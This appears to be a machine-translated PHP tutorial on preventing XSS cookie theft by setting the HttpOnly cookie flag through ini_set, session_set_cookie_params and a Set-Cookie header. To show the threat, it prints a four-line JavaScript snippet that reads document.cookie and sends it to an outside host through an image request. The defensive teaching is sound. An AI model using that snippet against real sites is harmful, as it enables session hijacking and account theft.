Home > Backend Development > PHP Tutorial > xss defense php uses httponly to prevent xss attacks_PHP tutorial

xss defense php uses httponly to prevent xss attacks_PHP tutorial

WBOY
Release: 2016-07-13 10:35:25
Original
987 people have browsed it

Needless to say, the concept of Or session hijacking, if it contains a lot of sensitive information (identity information, administrator information), etc., it's over. . .

The following js is used to obtain cookie information:

Copy code The code is as follows:

url=document.top.location.href;
cookie=document.cookie ;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;

Generally, cookies are obtained from document objects. Now when browsers set cookies, they generally accept a parameter called HttpOnly, just like other parameters such as domain. Once this HttpOnly is set, you can set it in the document of the browser. The cookie is no longer visible in the object.

PHP settings HttpOnly:

Copy code The code is as follows:

//In php.ini, session.cookie_httponly = ture to enable global cookies The HttpOnly attribute
ini_set("session.cookie_httponly", 1);

//or the seventh parameter of setcookie() is set to true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

For PHP versions prior to PHP5.1 pass:

Copy code The code is as follows:

header("Set-Cookie: hidden=value; httpOnly");

Finally, HttpOnly is not a panacea!

www.bkjia.comtruehttp: //www.bkjia.com/PHPjc/744327.htmlTechArticleNeedless to say, the concept of xss is extremely harmful, which means that once your If an XSS vulnerability appears on a website, arbitrary JS code can be executed. The most terrifying thing is that attackers use JS to obtain...
Related labels:
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template